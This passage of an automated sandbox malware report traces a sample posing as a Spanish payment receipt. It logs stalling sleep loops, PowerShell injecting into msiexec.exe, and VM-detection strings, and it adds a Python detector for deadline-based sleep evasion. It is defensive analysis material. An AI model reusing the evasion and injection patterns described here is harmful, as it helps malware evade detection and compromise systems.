            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596937
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596828
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596718
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596603
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596500
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596390
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596281
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596171
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596062
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595953
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595843
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595734
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595621
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595515
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595406
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595296
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595187
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595078
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594968
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594859
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594750
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594640
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6288
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3475
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj887A.tmp\nsExec.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648 Thread sleep time: -9223372036854770s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -26747778906878833s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -599890s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8144 Thread sleep count: 1172 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8144 Thread sleep count: 8681 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -599781s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -599672s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -599562s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -599453s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -599344s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -599234s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -599125s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -599015s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -598906s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -598797s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -598687s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -598578s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -598468s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -598359s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -598250s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -598140s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -598031s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -597922s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -597812s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -597703s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -597593s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -597484s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -597375s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -597265s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -597156s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -597047s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -596937s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -596828s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -596718s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -596603s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -596500s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -596390s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -596281s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -596171s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -596062s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -595953s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -595843s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -595734s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -595621s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -595515s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -595406s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -595296s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -595187s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -595078s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -594968s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -594859s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -594750s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8140 Thread sleep time: -594640s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C13
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe Code function: 0_2_0040683D FindFirstFileW,FindClose, 0_2_0040683D
            Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599890
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599781
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599672
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599562
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599453
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599344
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599234
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599125
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 599015
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598906
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598797
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598687
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598578
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598468
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598359
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598250
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598140
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 598031
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597922
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597812
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597703
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597593
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597484
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597375
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597265
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597156
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 597047
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596937
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596828
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596718
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596603
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596500
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596390
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596281
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596171
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 596062
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595953
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595843
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595734
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595621
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595515
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595406
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595296
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595187
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595078
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594968
            Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594859
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594640Jump to behavior
Source: powershell.exe, 00000001.00000002.2053769821.0000000005180000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter@\^q
Source: powershell.exe, 00000001.00000002.2053769821.0000000005180000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter@\^q
Source: msiexec.exe, 00000006.00000002.2924097464.0000000005F27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWW
Source: ModuleAnalysisCache.1.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000006.00000002.2936459320.0000000021C07000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd1f89892680e0<
Source: Justificante pago-09453256434687.exe, 00000000.00000002.1740887264.00000000006B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: ModuleAnalysisCache.1.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000006.00000002.2936459320.0000000021BF3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd1f5b7140c899<
Source: msiexec.exe, 00000006.00000002.2924097464.0000000005F27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000006.00000002.2924097464.0000000005ECA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
Source: powershell.exe, 00000001.00000002.2053769821.0000000005180000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter@\^q
Source: ModuleAnalysisCache.1.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | API call chain: ExitProcess graph end node (graph_0-3802)
Source: C:\Users\user\Desktop\Justificante pago-09453256434687.exe | API call chain: ExitProcess graph end node (graph_0-3806)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_009FF520 LdrInitializeThunk,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug
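The 42 delay requests listed above for msiexec.exe are not one long sleep: each value is roughly 109 to 110 smaller than the one before it (599125 down to 594640). That is what a deadline-based stalling loop produces: the code reads the clock, sleeps for "deadline minus now", and repeats, so every call asks for slightly less than the last, and a sandbox that shortens Sleep simply gets asked again. The analyzer below is an added example and not part of the Joe Sandbox report. It parses entries in the report's "Thread delayed" format, treats the values as milliseconds (an assumption; the report does not state the unit, but the figure agrees with the "long sleeps (>= 3 min)" signature), and flags both the long-sleep condition and the recompute pattern. The sample input is constructed, with the first eight delay values copied from the entries above.

```python
import re
from statistics import median

# Constructed input in the report's "Thread delayed" format. The delay values are the
# first eight msiexec.exe entries from the report; the separator is cosmetic.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599125
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 599015
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598906
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598797
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598687
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598578
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598468
Source: C:\Windows\SysWOW64\msiexec.exe | Thread delayed: delay time: 598359
""".strip().splitlines()

# Tolerates both "exe | Thread delayed" and the fused "exeThread delayed" extraction form.
DELAY_RE = re.compile(r"Source:\s*(?P<proc>\S+?)(?:\s*\|\s*|)Thread delayed:.*?delay time:\s*(?P<ms>\d+)")

# Assumption: delay values are milliseconds. 3 minutes is the report's own long-sleep threshold.
LONG_SLEEP_MS = 3 * 60 * 1000


def parse_delays(lines):
    """Return {process_path: [delay, ...]} preserving report order."""
    out = {}
    for line in lines:
        m = DELAY_RE.search(line)
        if m:
            out.setdefault(m.group("proc"), []).append(int(m.group("ms")))
    return out


def analyze_delays(delays):
    """Summarise one process's sleep requests.

    deadline_loop is set when successive requests shrink by a small, nearly constant
    step: the caller is re-reading the clock and sleeping for the remaining time,
    which is how a stall survives a sandbox that returns early from Sleep.
    """
    n = len(delays)
    deltas = [a - b for a, b in zip(delays, delays[1:])]
    step = median(deltas) if deltas else 0
    tight = bool(deltas) and all(abs(d - step) <= max(5, 0.1 * abs(step)) for d in deltas)
    return {
        "calls": n,
        "max_requested_ms": max(delays) if delays else 0,
        "total_requested_ms": sum(delays),
        "median_step_ms": step,
        "long_sleep": any(d >= LONG_SLEEP_MS for d in delays),
        "deadline_loop": n >= 3 and tight and 0 < step < 0.01 * max(delays),
    }


def summarize(lines):
    """Per-process verdicts for a block of report lines."""
    return {proc: analyze_delays(vals) for proc, vals in parse_delays(lines).items()}


if __name__ == "__main__":
    for proc, verdict in summarize(SAMPLE_LINES).items():
        print(proc, verdict)
```

The total_requested_ms figure is the useful triage number: eight requests already add up to about 80 minutes of requested sleep inside a run that lasted a few minutes, which is only possible if the sandbox shortened the calls and the sample kept re-issuing them.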

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 42E0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (4 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation (3 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (10 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (9 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (12 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation (3 consecutive identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation
